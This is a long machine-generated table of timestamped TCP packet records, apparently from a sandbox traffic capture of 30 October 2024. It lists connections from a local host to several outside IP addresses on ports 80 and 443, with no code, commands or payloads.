                                                                    Oct 30, 2024 01:42:20.443506956 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:20.443773985 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:20.443844080 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:20.444679976 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:20.444741011 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:20.444773912 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:20.445559978 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:20.445636988 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:20.559405088 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:20.559484005 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:20.559783936 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:20.559847116 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:20.560359955 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:20.560419083 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:20.568228006 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:20.568326950 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:20.675642967 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:20.675719023 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:20.676273108 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:20.676346064 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:20.676505089 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:20.676559925 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:20.684185028 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:20.684262037 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:20.791261911 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:20.791491985 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:20.791847944 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:20.791943073 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:20.792541981 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:20.792610884 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:20.800066948 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:20.800160885 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:20.907138109 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:20.907285929 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:20.907301903 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:20.907346964 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:20.907448053 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:20.908179998 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:20.908260107 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:20.915772915 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:20.915851116 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:20.916410923 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:20.916486979 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.023180008 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.023284912 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.023808002 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.023991108 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.024368048 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.024445057 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.031816006 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.031896114 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.138884068 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.138966084 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.139141083 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.139206886 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.139878988 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.139947891 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.147476912 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.147561073 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.147952080 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.148030043 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.254676104 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.254756927 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.254789114 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.254859924 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.255640984 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.255714893 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.263380051 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.263453007 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.263812065 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.263974905 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.311847925 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.311985016 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.370805979 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.371011019 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.371556044 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.371637106 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.379333019 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.379440069 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.379549026 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.379633904 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.380263090 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.380332947 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.486629963 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.486742020 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.486855984 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.486932039 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.487602949 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.487679005 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.495261908 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.495357037 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.495863914 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.495934963 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.543761015 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.543837070 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.602597952 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.602669954 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.603231907 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.603338957 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.603559017 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.603647947 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.611272097 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.611351013 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.611928940 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.611996889 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.659681082 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.659770012 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.718735933 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.718827009 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.719137907 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.719208956 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.719688892 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.719772100 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.727159977 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.727233887 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.727444887 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.727521896 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.728322029 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.728390932 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.834531069 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.834620953 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.835163116 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.835226059 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.835417986 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.835483074 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.842917919 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.843007088 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.843511105 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.843589067 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.843816042 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.843878984 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.891532898 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.891603947 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.950645924 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.950823069 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.951201916 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.951281071 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.952251911 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.952322006 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.958791018 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.958863020 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.959671021 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.959753990 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:21.960277081 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:21.960347891 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.007575989 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.007682085 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.066708088 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.066881895 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.067176104 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.067276955 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.067703009 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.067784071 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.074717999 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.074795008 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.075282097 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.075372934 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.075751066 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.075833082 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.076395035 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.076466084 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.123821020 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.123924971 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.182811022 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.182900906 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.183813095 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.183902025 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.190663099 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.190737009 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.190941095 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.191015005 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.191212893 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.191272974 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.191962957 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.192034006 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.239763021 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.239953995 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.303443909 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.303585052 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.303638935 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.303697109 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.303735971 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.303783894 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.303874016 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.303982973 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.306704998 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.306814909 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.306862116 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.306917906 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.307353973 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.307440042 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.308018923 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.308095932 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.355333090 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.355422974 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.414277077 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.414390087 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.419213057 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.419296980 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.419658899 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.419730902 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.422442913 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.422512054 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.422837973 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.422908068 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.423326969 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.423408031 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.423724890 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.423795938 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.424304008 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.424387932 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.471558094 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.471653938 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.530524015 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.530622959 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.535248041 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.535346031 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.535696983 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.535774946 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.538742065 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.538801908 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.538824081 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.538858891 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.538889885 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.538916111 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.539235115 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.539336920 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.539783001 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.539854050 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.583343029 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.583421946 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.587400913 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.587496996 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.646759033 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.646848917 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.646852970 CET44349749190.107.177.80192.168.2.4
                                                                    Oct 30, 2024 01:42:22.646910906 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:22.650304079 CET49749443192.168.2.4190.107.177.80
                                                                    Oct 30, 2024 01:42:23.572179079 CET4974480192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:23.578413010 CET8049744193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:23.578493118 CET4974480192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:23.583303928 CET49753443192.168.2.4149.154.167.220
                                                                    Oct 30, 2024 01:42:23.583336115 CET44349753149.154.167.220192.168.2.4
                                                                    Oct 30, 2024 01:42:23.583527088 CET49753443192.168.2.4149.154.167.220
                                                                    Oct 30, 2024 01:42:23.584156036 CET49753443192.168.2.4149.154.167.220
                                                                    Oct 30, 2024 01:42:23.584168911 CET44349753149.154.167.220192.168.2.4
                                                                    Oct 30, 2024 01:42:24.435621977 CET44349753149.154.167.220192.168.2.4
                                                                    Oct 30, 2024 01:42:24.435698986 CET49753443192.168.2.4149.154.167.220
                                                                    Oct 30, 2024 01:42:24.440965891 CET49753443192.168.2.4149.154.167.220
                                                                    Oct 30, 2024 01:42:24.440970898 CET44349753149.154.167.220192.168.2.4
                                                                    Oct 30, 2024 01:42:24.441354036 CET44349753149.154.167.220192.168.2.4
                                                                    Oct 30, 2024 01:42:24.454543114 CET49753443192.168.2.4149.154.167.220
                                                                    Oct 30, 2024 01:42:24.495337009 CET44349753149.154.167.220192.168.2.4
                                                                    Oct 30, 2024 01:42:24.495395899 CET49753443192.168.2.4149.154.167.220
                                                                    Oct 30, 2024 01:42:24.495400906 CET44349753149.154.167.220192.168.2.4
                                                                    Oct 30, 2024 01:42:24.629467964 CET4975480192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:24.635113001 CET8049754193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:24.635236025 CET4975480192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:24.635499954 CET4975480192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:24.640804052 CET8049754193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:24.767904043 CET44349753149.154.167.220192.168.2.4
                                                                    Oct 30, 2024 01:42:24.814820051 CET49753443192.168.2.4149.154.167.220
                                                                    Oct 30, 2024 01:42:24.814829111 CET44349753149.154.167.220192.168.2.4
                                                                    Oct 30, 2024 01:42:24.815205097 CET49753443192.168.2.4149.154.167.220
                                                                    Oct 30, 2024 01:42:24.815243006 CET44349753149.154.167.220192.168.2.4
                                                                    Oct 30, 2024 01:42:24.815294027 CET49753443192.168.2.4149.154.167.220
                                                                    Oct 30, 2024 01:42:25.319849968 CET8049754193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:25.322902918 CET4975480192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:25.328269005 CET8049754193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:25.483360052 CET8049754193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:25.533575058 CET4975480192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:25.559777975 CET49755443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:25.559794903 CET44349755188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:25.559866905 CET49755443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:25.602201939 CET49755443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:25.602210999 CET44349755188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:26.225142002 CET44349755188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:26.225209951 CET49755443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:26.226416111 CET49755443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:26.226423025 CET44349755188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:26.226798058 CET44349755188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:26.267949104 CET49755443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:26.278613091 CET49755443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:26.323329926 CET44349755188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:26.427150011 CET44349755188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:26.427218914 CET44349755188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:26.427282095 CET49755443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:26.430334091 CET49755443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:26.434072018 CET4975480192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:26.439424992 CET8049754193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:26.595895052 CET8049754193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:26.604036093 CET49756443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:26.604088068 CET44349756188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:26.604166031 CET49756443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:26.604573965 CET49756443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:26.604590893 CET44349756188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:26.643064022 CET4975480192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:27.223500013 CET44349756188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:27.225346088 CET49756443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:27.225392103 CET44349756188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:27.376651049 CET44349756188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:27.376718044 CET44349756188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:27.376822948 CET49756443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:27.377512932 CET49756443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:27.380433083 CET4975480192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:27.381692886 CET4975780192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:27.386338949 CET8049754193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:27.386409044 CET4975480192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:27.387089968 CET8049757193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:27.387226105 CET4975780192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:27.387289047 CET4975780192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:27.392596960 CET8049757193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:28.048476934 CET8049757193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:28.050260067 CET49758443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:28.050306082 CET44349758188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:28.050379038 CET49758443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:28.050699949 CET49758443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:28.050719023 CET44349758188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:28.096136093 CET4975780192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:28.649301052 CET44349758188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:28.651364088 CET49758443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:28.651400089 CET44349758188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:28.795346022 CET44349758188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:28.795403957 CET44349758188.114.97.3192.168.2.4
                                                                    Oct 30, 2024 01:42:28.795484066 CET49758443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:28.795974970 CET49758443192.168.2.4188.114.97.3
                                                                    Oct 30, 2024 01:42:28.801156998 CET4975980192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:28.806730986 CET8049759193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:28.806838036 CET4975980192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:28.806972980 CET4975980192.168.2.4193.122.130.0
                                                                    Oct 30, 2024 01:42:28.812446117 CET8049759193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:29.470882893 CET8049759193.122.130.0192.168.2.4
                                                                    Oct 30, 2024 01:42:29.472701073 CET49760443192.168.2.4188.114.97.3
